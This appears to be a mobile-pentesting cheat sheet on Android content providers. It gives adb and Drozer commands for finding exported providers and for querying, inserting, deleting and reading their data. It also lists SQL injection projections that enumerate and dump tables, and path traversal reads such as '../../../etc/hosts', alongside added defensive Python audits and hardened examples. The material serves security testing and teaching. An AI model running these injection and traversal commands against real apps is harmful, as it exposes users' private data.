
# Content providers

## Finding exported content providers

```sh
# AndroidManifest.xml
## explicitly
grep "<provider" app-decompiled/AndroidManifest.xml | grep "android:exported=\"true\""
## implicitly (has an intent filter and no explicit android:exported attribute)
grep "<intent-filter" -B 1 app-decompiled/AndroidManifest.xml | grep "<provider" | grep --invert-match "android:exported="

# Drozer
run app.provider.info -a <app-package-name>
```
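
The grep commands above only match when `<provider` and `android:exported` share a line, and they do not show whether a permission guards the provider. The following Python audit is an added example, not part of the original page: it parses the decoded manifest and reports each provider's export state and declared permissions. The sample manifest, package name and function name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
GUARD_ATTRS = ("permission", "readPermission", "writePermission")

# Constructed sample manifest (hypothetical app, not taken from a real APK).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application>
    <provider android:name=".NotesProvider"
        android:authorities="com.example.app.notes"
        android:exported="true"/>
    <provider android:name=".FilesProvider" android:exported="true"
        android:authorities="com.example.app.files"
        android:readPermission="com.example.app.READ_FILES"/>
    <provider android:name=".SearchProvider" android:authorities="com.example.app.search">
      <intent-filter><action android:name="com.example.app.SEARCH"/></intent-filter>
    </provider>
    <provider android:name=".CacheProvider" android:exported="false"
        android:authorities="com.example.app.cache"/>
  </application>
</manifest>"""


def audit_providers(manifest_xml):
    """Classify every <provider> the way the two grep commands above do."""
    findings = []
    for prov in ET.fromstring(manifest_xml).iter("provider"):
        exported = prov.get(ANDROID_NS + "exported")
        if exported is None:
            has_filter = prov.find("intent-filter") is not None
            state = "implicit" if has_filter else "unset"
        else:  # a value such as @bool/... cannot be resolved here
            state = {"true": "explicit", "false": "disabled"}.get(exported, "unresolved")
        guards = {a: prov.get(ANDROID_NS + a) for a in GUARD_ATTRS
                  if prov.get(ANDROID_NS + a)}
        findings.append({
            "name": prov.get(ANDROID_NS + "name"),
            "authorities": prov.get(ANDROID_NS + "authorities"),
            "state": state,
            "guards": guards,
            # Reachable by other apps with no permission declared on the provider.
            "unprotected": state in ("explicit", "implicit") and not guards,
        })
    return findings


if __name__ == "__main__":
    for f in audit_providers(SAMPLE_MANIFEST):
        print(f["state"], f["authorities"], f["guards"] or "NO PERMISSION", sep="\t")
```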

## Obtaining content provider URIs

```sh
# Drozer
run app.provider.finduri <app-package-name>
run scanner.provider.finduris -a <app-package-name>
```

## General interaction with content providers

### Android Debug Bridge (adb) <a href="#interaccion-general-con-content-providers-adb" id="interaccion-general-con-content-providers-adb"></a>

```sh
# General
adb shell content <command> --uri <uri> <parameters>

# Select
adb shell content query --uri <uri>
adb shell content query --uri <uri> --projection <column-name>
adb shell content query --uri <uri> --where <column-name>=<column-value>
adb shell content query --uri <uri> --where "<column-name>=\'<column-value>\'"

# Insert
adb shell content insert --uri <uri> --bind <column-name>:<column-type>:<column-value>

# Delete
adb shell content delete --uri <uri>
adb shell content delete --uri <uri> --where <column-name>=<column-value>

# Update
adb shell content update --uri <uri> --bind <column-name>:<column-type>:<column-value> --where <column-name>=<column-value>

# Read a file
adb shell content read --uri <uri>/<file>

# Download a file
adb shell content read --uri <uri>/<file> > <file>
```

### Drozer <a href="#interaccion-general-con-content-providers-drozer" id="interaccion-general-con-content-providers-drozer"></a>

```sh
# Select
run app.provider.query <uri>
run app.provider.query <uri> --projection <column-name>
run app.provider.query <uri> --selection <column-name>=<column-value>
run app.provider.query <uri> --selection <column-name>=\'<column-value>\'

# Insert
run app.provider.insert <uri> --<column-type> <column-name> <column-value>
run app.provider.insert <uri> --string <column-name> <column-value> --integer <column-name> <column-value>

# Delete
run app.provider.delete <uri>
run app.provider.delete <uri> --selection <column-name>=<column-value>
run app.provider.delete <uri> --selection <column-name>=\'<column-value>\'

# Update
run app.provider.update <uri> --selection <column-name>=<column-value> --<column-type> <column-name> <column-value>

# Read a file
run app.provider.read <uri>/<file>

# Download a file
run app.provider.download <uri>/<file> .
```

## SQL injection (SQLi)

Identifying SQLi.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "\'"

# Drozer 
run scanner.provider.injection -a <app-package-name>
run app.provider.query <uri> --projection "'"
run app.provider.query <uri> --selection "'"
```

Enumerating tables.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ SQLITE_MASTER\ WHERE\ type=\'table\'\;--"

# Drozer
run scanner.provider.sqltables -a <app-package-name>
run app.provider.query <uri> --projection "* FROM SQLITE_MASTER WHERE type='table';--"
```

Retrieving data from a table.

```sh
# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ <table>\;--"

# Drozer
run app.provider.query <uri> --projection "* FROM <table>;--"
```
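
Why the lone quote and the `* FROM SQLITE_MASTER ...;--` projection above work, and what stops them: an added Python simulation (not from the original page, and not Android code) of a provider that concatenates the caller's projection into its `SELECT`, next to a variant that allowlists column names and binds values. The `notes` and `credentials` tables, the column names and the function names are constructed for illustration.

```python
import sqlite3

ALLOWED_COLUMNS = {"_id", "title", "body"}   # hypothetical public columns


def make_db():
    """Constructed in-memory database standing in for the provider's SQLite file."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notes (_id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("CREATE TABLE credentials (user TEXT, secret TEXT)")
    db.execute("INSERT INTO notes (title, body) VALUES ('todo', 'buy milk')")
    db.execute("INSERT INTO credentials VALUES ('admin', 'constructed-secret')")
    return db


def query_concatenated(db, projection, selection=None):
    """Vulnerable pattern: caller-supplied strings become part of the SQL text."""
    sql = "SELECT " + ", ".join(projection) + " FROM notes"
    if selection:
        sql += " WHERE " + selection
    return sql, db.execute(sql).fetchall()


def query_hardened(db, projection, column=None, value=None):
    """Allowlist column names; pass values only as bound parameters."""
    cols = list(projection) or sorted(ALLOWED_COLUMNS)
    for name in cols + ([column] if column else []):
        if name not in ALLOWED_COLUMNS:
            raise ValueError("column not allowed: %r" % name)
    sql = "SELECT " + ", ".join(cols) + " FROM notes"
    args = ()
    if column:
        sql += " WHERE " + column + " = ?"
        args = (value,)
    return sql, db.execute(sql, args).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "* FROM SQLITE_MASTER WHERE type='table';--"   # from the page
    sql, rows = query_concatenated(db, [payload])
    print(sql)                       # the trailing "FROM notes" is commented out
    print([r[1] for r in rows])      # table names, including the private one
    try:
        query_hardened(db, [payload])
    except ValueError as exc:
        print("rejected:", exc)
```

On Android the corresponding controls are a projection map with strict mode on `SQLiteQueryBuilder` and `selectionArgs` for values.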

## Path traversal

Identifying path traversal.

```sh
# Drozer
run scanner.provider.traversal -a <app-package-name>
```

Reading a file.

```sh
# Android Debug Bridge (adb)
adb shell content read --uri <uri>/<file>
adb shell content read --uri <uri>/../../../<file>
adb shell content read --uri <uri>/../../../etc/hosts

# Drozer
run app.provider.read <uri>/<file>
run app.provider.read <uri>/../../../<file>
run app.provider.read <uri>/../../../etc/hosts
```
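
The check a file-backed provider needs before opening the path taken from a URI such as `<uri>/../../../etc/hosts`, as an added Python sketch (not from the original page, and not Android code). It contrasts a string-prefix check, which a sibling directory still passes, with a containment check on the resolved path. The base directory, authority and function names are hypothetical.

```python
import os
from urllib.parse import unquote, urlsplit

BASE_DIR = "/data/data/com.example.app/files"   # hypothetical provider root


def _candidate(uri, base_dir):
    """Join the URI's decoded path onto base_dir and normalise '..' segments."""
    parts = urlsplit(uri)
    if parts.scheme != "content":
        raise ValueError("not a content URI")
    # Decode first, so the check sees the same string the file API would open.
    relative = unquote(parts.path).lstrip("/")
    return os.path.realpath(os.path.join(base_dir, relative))


def resolve_prefix_check(uri, base_dir=BASE_DIR):
    """Weak: plain string prefix, so a sibling such as files_backup/ passes."""
    target = _candidate(uri, base_dir)
    if not target.startswith(os.path.realpath(base_dir)):
        raise PermissionError(target)
    return target


def resolve_contained(uri, base_dir=BASE_DIR):
    """Hardened: the resolved path must be base_dir itself or below it."""
    base = os.path.realpath(base_dir)
    target = _candidate(uri, base_dir)
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(target)
    return target


if __name__ == "__main__":
    # Constructed URIs; the authority is hypothetical.
    for uri in ("content://com.example.app.files/report.txt",
                "content://com.example.app.files/../../../etc/hosts",
                "content://com.example.app.files/../files_backup/db.sqlite"):
        try:
            print("allowed", resolve_contained(uri))
        except PermissionError as exc:
            print("blocked", exc)
```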

